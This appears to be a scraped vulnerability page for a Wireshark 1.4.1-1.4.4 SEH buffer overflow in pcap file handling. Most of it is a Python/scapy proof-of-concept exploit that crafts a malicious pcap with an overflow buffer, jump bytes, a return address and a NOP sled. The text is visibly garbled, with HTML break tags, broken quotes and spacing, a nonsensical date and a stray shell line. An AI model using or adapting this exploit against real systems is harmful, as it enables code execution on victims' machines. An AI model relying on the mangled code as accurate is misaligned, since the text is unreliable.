Wireshark 1.4.1-1.4.4 buffer overflow vulnerability in pcap File Processing

Wireshark is a network protocol analysis tool in windows/linux. Wireshark 1.4.1-1.4.4 has a buffer overflow vulnerability when processing pcap files, which may cause arbitrary code execution. Wireshark 1.4.5 fixes this security issue.

[+] Info:
~~~~~~~~~
Wireshark 1.4.1-1.4.4 SEH Overflow Exploit

[+] Poc:
~~~~~~~~~
 

View sourceprint? 1 #! /Usr/bin/env python <BR> # Vulnerable app: Wireshark 1.4.1-1.4.4 <BR> # Author: sickness <BR> # Download: <BR> # OS: tested it on Windows XP SP2 and SP3 but it shoshould work on every Windows with DEP off (still working on a drop exploit) <BR> # DATE: 172.164.2011 <BR> # Fixed in latest version 1.4.5 <BR> # do not forget to feel the pwnsauce with: ####### "> http://redmine.corelan.be: 8800/projects/pvefindaddr <BR> #######

<BR> # Offset might change! <BR> # Watch out for other bad chars !! <BR> # Current bad chars: x00x0ax0dx09 <BR> #################################### ################################< BR> # References: <BR> # https://bugs.wireshark.org/bugzilla/show_bug.cgi? Id = 5836 <BR> ################################## ##################################


Import "> https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838 <BR> ##################################### ########### <BR> import sys <BR> from scapy. all import * <BR> export payload=calc.exe <BR> # ppr is from a non-ASLR enabled wireshark module <BR> edevil = Ether (type = 0x2323) /("x41" * 1239 + "xebx06x90x90" + "x5Dx10x94x62" + "x90" * 16 + "bytes Bytes Protocol "+" x90 "* 4500) <BR> wrpcap (" edevil. pcap ", edevil) <BR> print" "<BR> print" edevil. pcap file created! "<BR> print" Its pwnsauce time!"